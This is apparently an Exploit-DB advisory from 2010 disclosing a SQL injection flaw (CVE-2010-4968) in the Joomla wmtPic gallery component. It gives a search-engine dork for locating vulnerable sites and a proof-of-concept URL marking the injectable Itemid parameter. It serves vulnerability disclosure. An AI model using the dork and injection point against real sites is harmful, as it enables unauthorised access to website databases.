Joomla! Component com_wmtpic 1.0 - SQL Injection

Author: RoAd_KiLlEr
type: webapps
platform: php
port: 
date_added: 2010-06-30 
date_updated: 2016-12-20 
verified: 0 
codes: CVE-2010-4968;OSVDB-76971 
tags: 
aliases:  
screenshot_url:  
application_url: 

1                ###########################################           1
0                I'm **RoAd_KiLlEr**  member from Inj3ct0r Team        1
1                ###########################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+]Title     : Joomla  Component  com_wmtpic  SQL Injection Vulnerability
[+]Author    : **RoAd_KiLlEr**
[+]Contact   : RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on : Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://a-h-crew.net
[~] Vendor: http://www.webmaster-tips.net
[~] Download App:http://www.webmaster-tips.net/Download/View-details/9-Joomla-Components/183-Joomla-1.5-Flash-Gallery-wmtPic.html
==========ExPl0iT3d by **RoAd_KiLlEr**==========

[+]Description:
Flash based image gallery for Joomla. Joomla component wmtPic, with thumbnail support, caption and multiple file upload option. Although it is not a must, it is better to put a link back to this site "Joomla component by Webmaster-tips.net " on your website if you can. This Joomla 1.5 Component is licensed under the GPLv2.0.

=========================================

[+] Dork: inurl:"com_wmtpic"

==========================================


[+].  SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+

[Exploit]:  http://127.0.0.1/path/index.php?option=com_wmtpic&Itemid=[] <== SQL-i